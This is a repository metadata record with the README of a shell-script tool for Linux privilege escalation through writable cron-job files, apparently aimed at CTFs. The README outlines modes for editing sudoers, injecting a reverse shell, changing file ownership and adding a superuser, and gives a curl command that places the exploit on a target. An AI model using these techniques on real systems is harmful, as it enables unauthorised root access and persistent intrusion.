{"id":20847286,"url":"https://github.com/jsmoreira02/cronjob-exploit","last_synced_at":"2025-03-12T11:43:18.751Z","repository":{"id":185390742,"uuid":"673437903","full_name":"Jsmoreira02/Cronjob-Exploit","owner":"Jsmoreira02","description":"Privilege escalation method using writable files in /etc/crontab on linux systems. Made in Shell Script for automation during the hack (and with a special attention to CTFs)","archived":false,"fork":false,"pushed_at":"2024-07-11T03:46:25.000Z","size":48,"stargazers_count":3,"open_issues_count":0,"forks_count":0,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-01-19T05:38:09.095Z","etag":null,"topics":["crontab-task","ctf-tools","cybersecurity","hacking-tool","privilege-escalation-exploits","shell-script"],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Jsmoreira02.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-08-01T16:10:39.000Z","updated_at":"2024-07-11T03:46:28.000Z","dependencies_parsed_at":"2023-11-10T11:10:23.445Z","dependency_job_id":"0f25e2e1-e9d6-4fe3-ba27-ecb155d62068","html_url":"https://github.com/Jsmoreira02/Cronjob-Exploit","commit_stats":null,"previous_names":["jsmoreira02/cronjob-exploit"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Jsmoreira02%2FCronjob-Exploit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Jsmoreira02%2FCronjob-Exploit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Jsmoreira02%2FCronjob-Exploit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Jsmoreira02%2FCronjob-Exploit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Jsmoreira02","download_url":"https://codeload.github.com/Jsmoreira02/Cronjob-Exploit/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243213867,"owners_count":20254879,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["crontab-task","ctf-tools","cybersecurity","hacking-tool","privilege-escalation-exploits","shell-script"],"created_at":"2024-11-18T02:19:33.832Z","updated_at":"2025-03-12T11:43:18.715Z","avatar_url":"https://github.com/Jsmoreira02.png","language":"Shell","readme":"\n\u003cdiv align=\"center\"\u003e\n\n  ![logo](https://github.com/Jsmoreira02/Cronjob-Exploit/assets/103542430/c9c7910f-2ad3-4458-b719-77c68e23b45a)\n    \n  [![License: GPL-2.0](https://img.shields.io/badge/License-GPL--2.0-blue.svg)](https://opensource.org/licenses/GPL-2.0)\n  \u003cimg src=\"https://img.shields.io/badge/Language%20-Shell Script-darkgreen.svg\" style=\"max-width: 100%;\"\u003e\n  \u003cimg src=\"https://img.shields.io/badge/Tool%20-Privilege escalation-brown.svg\" style=\"max-width: 100%;\"\u003e\n  \u003cimg src=\"https://img.shields.io/badge/Target OS%20-Linux-yellow.svg\" style=\"max-width: 100%;\"\u003e\n  \u003cimg src=\"https://img.shields.io/badge/CTFs tools%20-teste?style=flat\" style=\"max-width: 100%;\"\u003e  \n\u003c/div\u003e\n\n# \n\n***Cronjob Exploit For Privilege Escalation***\n\nThis script was built in shell script for privilege escalation using an writable file that will be executed by a privileged user in a Cron task.\n#\n\n```What is Cron Job? |crontab file|``` =\u003e Cron is a process running in the background of the system, listing files with commands to be executed periodically at fixed times, dates or intervals. The default system cron table or crontab configuration file is ***/etc/crontab***. Hackers use a writable file that will be run by an admin user in a cron job to inject commands or malicious code and gain control after the file runtime has arrived.\n\nAny user can read the file keeping system-wide cron jobs under /etc/crontab so check it. \n\n```\ncat /etc/crontab\n```\n\n***Installation***:\n```bash\ngit clone https://github.com/Jsmoreira02/Cronjob-Exploit.git\n```\n\n**Or upload directly to the target**\n```bash\ncurl -o /tmp/exploit.sh https://raw.githubusercontent.com/Jsmoreira02/Cronjob-Exploit/main/exploit_crontab.sh\n```\n#\n# Modes of operations\n\n***There are four privilege escalation methods in this script*** \n\n\n```                  \n                     1 - edit /etc/sudoers\n                     2 - reverse_shell injection\n                     3 - change file owner\n                     4 - add superuser\n                     5 - exit\n```\n\n\n### 1 - Edit etc/sudoers file\n\n![Gravando2024-04-02193557-ezgif com-video-to-gif-converter](https://github.com/Jsmoreira02/Cronjob-Exploit/assets/103542430/14f9d5c1-d6ad-4d97-b764-2ff4152557fd)\n\nInserts within the sudoers configuration file, access of sensitive system commands, which can only be executed by the root user, without the need for a password.\n\n### 2 - Reverse shell injection \n\n![VdeosemttuloFeitocomoClipchamp1-ezgif com-video-to-gif-converter](https://github.com/Jsmoreira02/Cronjob-Exploit/assets/103542430/e080d5f8-a5f3-464c-a283-c454277db5e7)\n\nIt injects a reverse shell code inside the file and after being executed, the attacker will gain access to the user who owns the file or even the root user. The language of the reverse shell is of the user's choice.\n\n### 3 - Change file owner \n\nChange the file owner by injecting the bash terminal command: chown\n\n### 4 - Add superuser\n\n![Gravando2024-04-02193705-ezgif com-video-to-gif-converter](https://github.com/Jsmoreira02/Cronjob-Exploit/assets/103542430/350fd201-2f63-43f2-b124-46990ebc6239)\n\nAdds a new admin user on the system, with predefined password (The script will show it, don't worry :D).\n\n***Regardless of which mode you choose during the hack, you should always inform the location of the writable crontab file. After that, just wait for the cron task on the system to run and then exploit***\n\n# Warning:    \n\u003e I am not responsible for any illegal use or damage caused by this tool. It was written for fun, not evil and is intended to raise awareness about cybersecurity\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjsmoreira02%2Fcronjob-exploit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fjsmoreira02%2Fcronjob-exploit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjsmoreira02%2Fcronjob-exploit/lists"}